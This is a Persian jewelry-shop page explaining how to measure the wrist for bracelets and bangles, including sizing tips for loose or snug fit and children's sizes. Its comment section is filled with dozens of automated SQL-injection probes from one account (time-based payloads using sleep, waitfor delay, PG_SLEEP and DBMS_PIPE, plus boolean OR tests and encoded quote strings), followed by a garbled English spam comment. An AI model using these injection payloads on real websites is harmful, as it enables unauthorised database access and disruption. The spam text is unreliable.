جمعه, ۰۳ آبان,۱۳۹۸

راهنمای تعیین اندازه دستبند و النگو

اگر بخواهید دستبند یا النگویی را بدون آنکه روی دست خود اندازه بگیرید خریداری کنید اندازه دستبند یا النگوی خود را چگونه پیدا می کنید!

در اینجا ما روش های تعیین اندازه دستبند و النگو را شرح داده ایم.

تعیین اندازه دستبند با استفاده از نوار یا نخ یا دستبند دیگر و ...

برای اندازه گیری، با استفاده از یک متر یا نخ یا کاغذ باریک یا وسیله ای مشابه، آن قسمت از مچ که قرار است دستبند در آن قسمت قرار بگیرد اندازه گرفته و علامت بزنید و سپس اندازه آن را با خط کش تعیین کنید. وسیله اندازه گیری را دور مچ کیپ بگیرید. همچنین برای اینکار می توانید از متر استفاده کنید.

اندازه دستبند با اندازه گیری دور مچ

حال اگر می‌خواهید دستبند بر روی دستتان جمع و جور باشد، تنها نیم تا یک سانتی‌متر به اندازه آن اضافه کنید، اگر دستبندی که راحت باشد می‌پسندید، دو تا دو و نیم سانتی‌متر به آن اضافه کنید و اگر می‌خواهید دستبند بر روی دستتان کاملاً آزاد باشد، سه سانتی‌متر به اندازه اضافه کنید.

همچنین هر چه بدنه دستبند ضخیم‌تر باشد، بیشتر باید به اندازه مچ دست خود اضافه کنید.

برای اندازه گیری می توانید از یک دستبند دیگر که برای دستتان اندازه است نیز استفاده کنید. به اینصورت که دستبند را روی یک سطح صاف قرار داده و ابتدا تا انتهای آن را اندازه بزنید.

تعیین اندازه النگو با استفاده از نوار یا نخ یا النگوی دیگر و ...

برای اندازه گیری، دستتان را به حالتی که النگو را وارد دست می کنید قرار داده و با استفاده از نخ یا نوار و یا هر وسیله مشابه، پهن ترین قسمت دست خود را اندازه بگیرید. سپس عدد به دست آمده را با جدول زیر مقایسه کنید.

اندازه النگو

اندازه النگو بر اساس اندازه گیری دور دست

همچنین می توانید قطر داخلی یک النگوی دیگر که برای دستتان اندازه است را با خط کش یا متر اندازه گرفته و عدد به دست آمده را با جدول زیر مقایسه کنید.

اندازه گیری قطر النگو

اندازه النگو براساس اندازه گیری قطر

اندازه استاندارد دستبند کودکان

اندازه هایی که در جدول زیر آمده است تقریبی است.

اندازه تقریبی و استاندارد دستبند کودکان

اگر با استفاده از روش های اندازه گیری، اندازه شما بین دو سایز استاندارد قرار گرفت، بسته به سلیقه خود یک اندازه را انتخاب کنید به اینصورت که اگر دستبند جمع و جور را بیشتر ترجیح می دهید اندازه کوچکتر و در غیر اینصورت اندازه بزرگتر را انتخاب کنید.

ثبت نظر

متن نظر (86)

l
lxbfYeaa | یک سال پیش

j3jumJLh

l
lxbfYeaa | یک سال پیش

1*

l
lxbfYeaa | یک سال پیش

1*

l
lxbfYeaa | یک سال پیش

1*

l
lxbfYeaa | یک سال پیش

1*

l
lxbfYeaa | یک سال پیش

-1 OR 2+704-704-1=0+0+0+1

l
lxbfYeaa | یک سال پیش

-1 OR 3+704-704-1=0+0+0+1

l
lxbfYeaa | یک سال پیش

if(now()=sysdate(),sleep(15),0)

l
lxbfYeaa | یک سال پیش

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

l
lxbfYeaa | یک سال پیش

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

l
lxbfYeaa | یک سال پیش

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

l
lxbfYeaa | یک سال پیش

-1; waitfor delay '0:0:15' --

l
lxbfYeaa | یک سال پیش

-1); waitfor delay '0:0:15' --

l
lxbfYeaa | یک سال پیش

-1)); waitfor delay '0:0:15' --

l
lxbfYeaa | یک سال پیش

1 waitfor delay '0:0:15' --

l
lxbfYeaa | یک سال پیش

0FY9HXjy'; waitfor delay '0:0:15' --

l
lxbfYeaa | یک سال پیش

BgZ1dpa4'); waitfor delay '0:0:15' --

l
lxbfYeaa | یک سال پیش

cCALK0yJ')); waitfor delay '0:0:15' --

l
lxbfYeaa | یک سال پیش

-5 OR 678=(SELECT 678 FROM PG_SLEEP(15))--

l
lxbfYeaa | یک سال پیش

-5) OR 684=(SELECT 684 FROM PG_SLEEP(15))--

l
lxbfYeaa | یک سال پیش

-1)) OR 246=(SELECT 246 FROM PG_SLEEP(15))--

l
lxbfYeaa | یک سال پیش

ia2v68c8' OR 504=(SELECT 504 FROM PG_SLEEP(15))--

l
lxbfYeaa | یک سال پیش

W3uVqqgk') OR 114=(SELECT 114 FROM PG_SLEEP(15))--

l
lxbfYeaa | یک سال پیش

YPbtI08O')) OR 216=(SELECT 216 FROM PG_SLEEP(15))--

l
lxbfYeaa | یک سال پیش


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

l
lxbfYeaa | یک سال پیش


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

l
lxbfYeaa | یک سال پیش

1'"

l
lxbfYeaa | یک سال پیش

1����%2527%2522

l
lxbfYeaa | یک سال پیش

@@vZp4i

l
lxbfYeaa | یک سال پیش

555

l
lxbfYeaa | یک سال پیش

555

l
lxbfYeaa | یک سال پیش

555

l
lxbfYeaa | یک سال پیش

555

l
lxbfYeaa | یک سال پیش

555

l
lxbfYeaa | یک سال پیش

555

l
lxbfYeaa | یک سال پیش

555

l
lxbfYeaa | یک سال پیش

555

l
lxbfYeaa | یک سال پیش

555

l
lxbfYeaa | یک سال پیش

555

l
lxbfYeaa | یک سال پیش

555

l
lxbfYeaa | یک سال پیش

555

l
lxbfYeaa | یک سال پیش

555

l
lxbfYeaa | یک سال پیش

555

l
lxbfYeaa | یک سال پیش

555

l
lxbfYeaa | یک سال پیش

555

l
lxbfYeaa | یک سال پیش

555

l
lxbfYeaa | یک سال پیش

555

l
lxbfYeaa | یک سال پیش

555

l
lxbfYeaa | یک سال پیش

555

l
lxbfYeaa | یک سال پیش

555

l
lxbfYeaa | یک سال پیش

555

l
lxbfYeaa | یک سال پیش

555

l
lxbfYeaa | یک سال پیش

555

l
lxbfYeaa | یک سال پیش

-1 OR 2+595-595-1=0+0+0+1 --

l
lxbfYeaa | یک سال پیش

-1 OR 3+595-595-1=0+0+0+1 --

l
lxbfYeaa | یک سال پیش

-1 OR 2+576-576-1=0+0+0+1

l
lxbfYeaa | یک سال پیش

-1 OR 3+576-576-1=0+0+0+1

l
lxbfYeaa | یک سال پیش

-1' OR 2+791-791-1=0+0+0+1 --

l
lxbfYeaa | یک سال پیش

-1' OR 3+791-791-1=0+0+0+1 --

l
lxbfYeaa | یک سال پیش

-1' OR 2+358-358-1=0+0+0+1 or 'REYXq7nX'='

l
lxbfYeaa | یک سال پیش

-1' OR 3+358-358-1=0+0+0+1 or 'REYXq7nX'='

l
lxbfYeaa | یک سال پیش

-1" OR 2+601-601-1=0+0+0+1 --

l
lxbfYeaa | یک سال پیش

-1" OR 3+601-601-1=0+0+0+1 --

l
lxbfYeaa | یک سال پیش

if(now()=sysdate(),sleep(15),0)

l
lxbfYeaa | یک سال پیش

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

l
lxbfYeaa | یک سال پیش

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

l
lxbfYeaa | یک سال پیش

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

l
lxbfYeaa | یک سال پیش

-1; waitfor delay '0:0:15' --

l
lxbfYeaa | یک سال پیش

-1); waitfor delay '0:0:15' --

l
lxbfYeaa | یک سال پیش

-1)); waitfor delay '0:0:15' --

l
lxbfYeaa | یک سال پیش

1 waitfor delay '0:0:15' --

l
lxbfYeaa | یک سال پیش

TsohRaim'; waitfor delay '0:0:15' --

l
lxbfYeaa | یک سال پیش

tZIIOKeU'); waitfor delay '0:0:15' --

l
lxbfYeaa | یک سال پیش

UoLdlXO8')); waitfor delay '0:0:15' --

l
lxbfYeaa | یک سال پیش

-5 OR 328=(SELECT 328 FROM PG_SLEEP(15))--

l
lxbfYeaa | یک سال پیش

-5) OR 147=(SELECT 147 FROM PG_SLEEP(15))--

l
lxbfYeaa | یک سال پیش

-1)) OR 257=(SELECT 257 FROM PG_SLEEP(15))--

l
lxbfYeaa | یک سال پیش

oQDhybTY' OR 789=(SELECT 789 FROM PG_SLEEP(15))--

l
lxbfYeaa | یک سال پیش

ffl6rLyh') OR 873=(SELECT 873 FROM PG_SLEEP(15))--

l
lxbfYeaa | یک سال پیش

wXQClgAD')) OR 279=(SELECT 279 FROM PG_SLEEP(15))--

l
lxbfYeaa | یک سال پیش


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

l
lxbfYeaa | یک سال پیش


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

l
lxbfYeaa | یک سال پیش

1'"

l
lxbfYeaa | یک سال پیش

1����%2527%2522

l
lxbfYeaa | یک سال پیش

@@pEzja

G
مهمان | ۲ روز قبل

I loved as much as you will receive carried out right here.
The sketch is attractive, your authored subject matter stylish.
nonetheless, you command get got an nervousness over that you wish
be delivering the following. unwell unquestionably come more formerly again as exactly the
same nearly a lot often inside case you shield this hike.